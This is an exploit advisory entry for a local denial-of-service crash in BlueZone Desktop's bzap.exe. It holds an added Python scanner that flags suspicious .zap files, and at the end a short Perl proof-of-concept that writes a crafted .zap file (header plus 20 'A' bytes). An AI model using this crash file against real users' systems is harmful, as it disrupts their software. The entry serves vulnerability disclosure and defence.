vendor: BlueZone Desktop
by: Silent Dream
CVSS: 7.8 HIGH
Denial of Service
CWE: 400
Product Name: BlueZone Desktop
Affected Version From: Latest
Affected Version To: Latest
Patch Exists: No
Related CWE: N/A
CPE: a:rocket_software:bluezone_desktop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

BlueZone Desktop Malformed .zap file Local Denial of Service

A maliciously crafted .zap file can cause a denial of service when opened with bzap.exe. The file contains a header of 'BZAP200BK' followed by 20 'A' characters.

Mitigation:

Ensure that all .zap files are from trusted sources and are scanned for malicious content.
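
One way to apply the scanning advice to a folder of .zap files before anyone opens them. This is an added example, not code from the advisory or the vendor. It generalises the described file (header plus 20 'A' characters) to any short run of one repeated byte after the header; MAX_FILLER and the function names are assumptions, and the sample files are constructed.

```python
import os
import tempfile

MAGIC = b"BZAP200BK"   # header string given in the advisory
MAX_FILLER = 64        # assumed cut-off for a "short filler" body (not from the advisory)

def classify_zap(data: bytes) -> str:
    """Return 'not-zap', 'suspicious' or 'unknown' for the leading bytes of a file."""
    if not data.startswith(MAGIC):
        return "not-zap"
    body = data[len(MAGIC):]
    # Advisory's file: header + 20 identical bytes. Generalised to an empty
    # body or any short run of a single repeated byte.
    if len(body) <= MAX_FILLER and len(set(body)) <= 1:
        return "suspicious"
    return "unknown"   # real .zap layout is not documented here, so no "clean" verdict

def scan_tree(root: str) -> list[tuple[str, str]]:
    """Classify every *.zap under root; unreadable files are reported, not skipped."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(".zap"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    # One byte past the cut-off is enough to rule out short filler.
                    data = fh.read(len(MAGIC) + MAX_FILLER + 1)
            except OSError as exc:
                results.append((path, f"error: {exc}"))
                continue
            results.append((path, classify_zap(data)))
    return results

def demo() -> dict[str, str]:
    """Write constructed sample files to a temp dir and scan them."""
    samples = {
        "filler.zap": MAGIC + b"A" * 20,        # shape described in the advisory
        "other.zap": MAGIC + bytes(range(40)),  # constructed, varied body
        "renamed.zap": b"hello",                # constructed, wrong magic
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, blob in samples.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(blob)
        return {os.path.basename(p): v for p, v in scan_tree(tmp)}

if __name__ == "__main__":
    print(demo())
```

A 'suspicious' verdict is a reason to quarantine the file, and 'unknown' only means the file does not match this one pattern.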

Exploit-DB raw data:

# Exploit Title: BlueZone Desktop Malformed .zap file Local Denial of Service
# Date: 10-15-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3

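# To trigger: Run this script, double click file to open with bzap.exe, program dies.

my $file = "bluepwn.zap";   # output file name
my $head = "BZAP200BK";     # .zap header string
my $junk = "A" x 20;        # 20 filler bytes after the header

# Use one lexical filehandle for open, print and close
# (the original opened $File but closed $FILE).
open(my $File, ">", $file) or die "Cannot open $file: $!";
print $File $head.$junk;
close($File);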